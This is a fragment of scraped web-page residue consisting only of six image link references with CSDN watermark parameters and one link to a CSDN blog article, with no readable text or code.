[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 30]: /images/20221123/c6a891b922cd420d818de1d6bf5a03ce.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 31]: /images/20221123/0b9f143d0bb94c67a0c3a25006361a82.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 32]: /images/20221123/e4cd56d3ea034a9eb3cbc9de2e0a7c4c.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 33]: /images/20221123/c86fba01d6bb4a15975a9b60a4e82dea.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 34]: /images/20221123/f87df6c990704b91a2a66d2839049e5e.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 35]: /images/20221123/0297d1c6634f44a98d42962147327547.png
[-]: https://blog.csdn.net/lady_killer9/article/details/106791542